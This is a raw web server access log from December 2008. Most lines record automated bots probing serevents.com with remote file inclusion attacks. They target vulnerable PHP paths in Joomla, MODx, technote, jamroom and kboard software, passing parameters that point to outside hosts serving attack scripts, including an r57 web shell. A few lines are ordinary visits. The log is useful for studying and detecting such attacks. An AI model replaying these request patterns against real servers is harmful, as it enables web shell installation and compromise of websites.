216.104.34.142 - - [03/Dec/2008:08:44:33 -0800] "GET /logs/access.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
216.104.34.142 - - [03/Dec/2008:08:44:33 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
216.104.34.142 - - [03/Dec/2008:08:44:33 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
195.114.18.111 - - [03/Dec/2008:08:45:14 -0800] "GET /technote7/data/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "serevents.com"
195.114.18.111 - - [03/Dec/2008:08:45:14 -0800] "GET /logs//technote7/data/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "serevents.com"
195.114.18.111 - - [03/Dec/2008:08:45:16 -0800] "GET /logs/access.log//technote7/data/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "serevents.com"
195.114.18.111 - - [03/Dec/2008:08:45:46 -0800] "GET /logs/access.log//technote7/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "serevents.com"
195.114.18.111 - - [03/Dec/2008:08:45:47 -0800] "GET /technote7/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "serevents.com"
195.114.18.111 - - [03/Dec/2008:08:45:47 -0800] "GET /logs//technote7/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "serevents.com"
216.104.34.142 - - [03/Dec/2008:08:50:13 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
216.104.34.142 - - [03/Dec/2008:08:50:13 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
124.0.71.7 - - [03/Dec/2008:08:52:41 -0800] "GET /logs/access.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
124.0.71.7 - - [03/Dec/2008:08:52:42 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
218.153.70.248 - - [03/Dec/2008:08:53:38 -0800] "GET / HTTP/1.0" 200 763 "http://www.dcsense.com/FREDERICKSBURG.SER-ASSOC-INC-23178.profile.htm" "Mozilla/5.0 (compatible; LocalBot/2.1; +http://www.dcsense.com)" "www.serevents.com"
211.247.226.253 - - [03/Dec/2008:08:53:55 -0800] "GET /logs/access.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.247.226.253 - - [03/Dec/2008:08:53:56 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.247.226.253 - - [03/Dec/2008:08:53:56 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
195.225.170.148 - - [03/Dec/2008:08:54:05 -0800] "GET /?sourcedir=http://anonimo234.interfree.it/fuck.txt? HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "serevents.com"
195.225.170.148 - - [03/Dec/2008:08:54:05 -0800] "GET /logs/?sourcedir=http://anonimo234.interfree.it/fuck.txt? HTTP/1.1" 200 938 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "serevents.com"
69.50.213.186 - - [03/Dec/2008:08:54:44 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.serevents.com"
69.50.213.186 - - [03/Dec/2008:08:54:44 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.serevents.com"
69.50.213.186 - - [03/Dec/2008:08:54:44 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.serevents.com"
72.196.223.235 - - [03/Dec/2008:09:00:18 -0800] "GET / HTTP/1.1" 200 779 "http://www.google.com/search?hl=en&rlz=1G1GGLQ_ENUS281&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Frieling+%26+R+consultants,+fredericksburg,+va.&spell=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.serevents.com"
72.196.223.235 - - [03/Dec/2008:09:00:18 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "serevents.com"
72.196.223.235 - - [03/Dec/2008:09:00:18 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "serevents.com"
72.196.223.235 - - [03/Dec/2008:09:00:21 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "serevents.com"
72.196.223.235 - - [03/Dec/2008:09:00:23 -0800] "GET / HTTP/1.1" 200 779 "http://www.serevents.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.serevents.com"
69.50.213.186 - - [03/Dec/2008:09:01:34 -0800] "GET /logs/access.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.serevents.com"
80.237.81.146 - - [03/Dec/2008:09:05:20 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
80.237.81.146 - - [03/Dec/2008:09:05:21 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
80.237.81.146 - - [03/Dec/2008:09:05:21 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
124.0.210.117 - - [03/Dec/2008:09:05:44 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
124.0.210.117 - - [03/Dec/2008:09:05:44 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
124.0.210.117 - - [03/Dec/2008:09:05:44 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
80.237.81.146 - - [03/Dec/2008:09:06:37 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
80.237.81.146 - - [03/Dec/2008:09:06:37 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
80.237.81.146 - - [03/Dec/2008:09:06:38 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
216.104.34.142 - - [03/Dec/2008:09:06:43 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
216.104.34.142 - - [03/Dec/2008:09:06:43 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
216.104.34.142 - - [03/Dec/2008:09:06:44 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
195.225.170.148 - - [03/Dec/2008:09:08:12 -0800] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://anonimo234.interfree.it/fuck.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.serevents.com"
195.225.170.148 - - [03/Dec/2008:09:08:12 -0800] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://anonimo234.interfree.it/fuck.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.serevents.com"
202.52.163.157 - - [03/Dec/2008:09:08:26 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.topachatvente.fr/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.serevents.com"
202.52.163.157 - - [03/Dec/2008:09:08:42 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.topachatvente.fr/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.serevents.com"
124.0.71.7 - - [03/Dec/2008:09:09:03 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
124.0.71.7 - - [03/Dec/2008:09:09:04 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
66.160.185.20 - - [03/Dec/2008:09:12:28 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
66.160.185.20 - - [03/Dec/2008:09:12:28 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
216.65.1.253 - - [03/Dec/2008:09:13:16 -0800] "GET /logs/access.log//errors.php?error=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "serevents.com"
216.65.1.253 - - [03/Dec/2008:09:13:17 -0800] "GET /errors.php?error=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "serevents.com"
216.65.1.253 - - [03/Dec/2008:09:13:17 -0800] "GET /logs//errors.php?error=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "serevents.com"
80.237.81.146 - - [03/Dec/2008:09:14:13 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
195.225.170.148 - - [03/Dec/2008:09:14:24 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anonimo234.interfree.it/fuck.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.serevents.com"
195.225.170.148 - - [03/Dec/2008:09:14:24 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anonimo234.interfree.it/fuck.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.serevents.com"
216.104.34.142 - - [03/Dec/2008:09:15:31 -0800] "GET /logs/access_081101.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.serevents.com"
203.228.242.67 - - [03/Dec/2008:09:17:35 -0800] "GET /logs//include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
203.228.242.67 - - [03/Dec/2008:09:17:41 -0800] "GET /include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
216.65.1.253 - - [03/Dec/2008:09:19:15 -0800] "GET /logs//errors.php?error=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.serevents.com"
216.65.1.253 - - [03/Dec/2008:09:19:15 -0800] "GET /errors.php?error=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.serevents.com"
85.90.225.108 - - [03/Dec/2008:09:19:40 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "serevents.com"
85.90.225.108 - - [03/Dec/2008:09:19:40 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "serevents.com"
80.237.81.146 - - [03/Dec/2008:09:20:39 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
80.237.81.146 - - [03/Dec/2008:09:20:39 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
80.237.81.146 - - [03/Dec/2008:09:20:40 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
80.237.81.146 - - [03/Dec/2008:09:20:44 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
80.237.81.146 - - [03/Dec/2008:09:20:44 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
69.73.159.237 - - [03/Dec/2008:09:20:54 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 200 943 "-" "libwww-perl/5.810" "www.serevents.com"
69.73.159.237 - - [03/Dec/2008:09:20:54 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 200 943 "-" "libwww-perl/5.810" "www.serevents.com"
69.73.159.237 - - [03/Dec/2008:09:20:59 -0800] "GET /?path%5Bdocroot%5D=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.serevents.com"
69.73.159.237 - - [03/Dec/2008:09:20:59 -0800] "GET /?path%5Bdocroot%5D=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.serevents.com"
83.138.151.160 - - [03/Dec/2008:09:21:50 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.peb.com.ua/coin/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
83.138.151.160 - - [03/Dec/2008:09:21:50 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.peb.com.ua/coin/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
83.138.151.160 - - [03/Dec/2008:09:21:50 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.peb.com.ua/coin/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
83.138.151.160 - - [03/Dec/2008:09:21:57 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.peb.com.ua/coin/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
83.138.151.160 - - [03/Dec/2008:09:21:57 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.peb.com.ua/coin/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
83.138.151.160 - - [03/Dec/2008:09:21:57 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.peb.com.ua/coin/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
66.160.185.20 - - [03/Dec/2008:09:22:31 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
66.160.185.20 - - [03/Dec/2008:09:22:32 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
66.160.185.20 - - [03/Dec/2008:09:22:32 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
212.193.224.213 - - [03/Dec/2008:09:23:06 -0800] "GET /index.php?redir=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
212.193.224.213 - - [03/Dec/2008:09:23:06 -0800] "GET /index.php?redir=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
89.108.67.160 - - [03/Dec/2008:09:23:53 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.serevents.com"
89.108.67.160 - - [03/Dec/2008:09:23:54 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.serevents.com"
89.108.67.160 - - [03/Dec/2008:09:23:54 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.serevents.com"
212.193.224.213 - - [03/Dec/2008:09:25:47 -0800] "GET /index.php?redir=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
85.236.53.4 - - [03/Dec/2008:09:25:59 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://bamrecordsinc.com/images/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
85.236.53.4 - - [03/Dec/2008:09:25:59 -0800] "GET /logs//?path%5Bdocroot%5D=http://bamrecordsinc.com/images/id.txt????? HTTP/1.1" 200 943 "-" "libwww-perl/5.79" "serevents.com"
85.236.53.4 - - [03/Dec/2008:09:25:59 -0800] "GET /?path%5Bdocroot%5D=http://bamrecordsinc.com/images/id.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "serevents.com"
195.225.170.148 - - [03/Dec/2008:09:26:33 -0800] "GET /?mosConfig_absolute_path=http://anonimo234.interfree.it/fuck.txt? HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.serevents.com"
211.247.226.253 - - [03/Dec/2008:09:26:37 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.247.226.253 - - [03/Dec/2008:09:26:38 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
203.228.242.67 - - [03/Dec/2008:09:27:31 -0800] "GET /include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "serevents.com"
200.35.150.45 - - [03/Dec/2008:09:27:44 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.serevents.com"
200.35.150.45 - - [03/Dec/2008:09:27:44 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.serevents.com"
211.247.226.253 - - [03/Dec/2008:09:27:52 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.247.226.253 - - [03/Dec/2008:09:27:52 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.247.226.253 - - [03/Dec/2008:09:27:53 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
69.65.42.208 - - [03/Dec/2008:09:27:57 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.serevents.com"
69.65.42.208 - - [03/Dec/2008:09:27:57 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.serevents.com"
83.138.151.160 - - [03/Dec/2008:09:29:33 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.peb.com.ua/coin/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
83.138.151.160 - - [03/Dec/2008:09:29:33 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.peb.com.ua/coin/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
83.138.151.160 - - [03/Dec/2008:09:29:34 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.peb.com.ua/coin/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
77.221.130.16 - - [03/Dec/2008:09:30:22 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "serevents.com"
77.221.130.16 - - [03/Dec/2008:09:30:22 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "serevents.com"
69.50.213.186 - - [03/Dec/2008:09:31:25 -0800] "GET /skin/zero_vote/error.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "serevents.com"
69.50.213.186 - - [03/Dec/2008:09:31:25 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "serevents.com"
69.50.213.186 - - [03/Dec/2008:09:31:25 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "serevents.com"
64.124.222.166 - - [03/Dec/2008:09:31:36 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "serevents.com"
64.124.222.166 - - [03/Dec/2008:09:31:36 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "serevents.com"
222.233.52.18 - - [03/Dec/2008:09:32:11 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "serevents.com"
222.233.52.18 - - [03/Dec/2008:09:32:11 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "serevents.com"
66.36.231.96 - - [03/Dec/2008:09:32:15 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.vesta-tl.ru//assets/snippets/reflect/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.serevents.com"
66.36.231.96 - - [03/Dec/2008:09:32:15 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.vesta-tl.ru//assets/snippets/reflect/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.serevents.com"
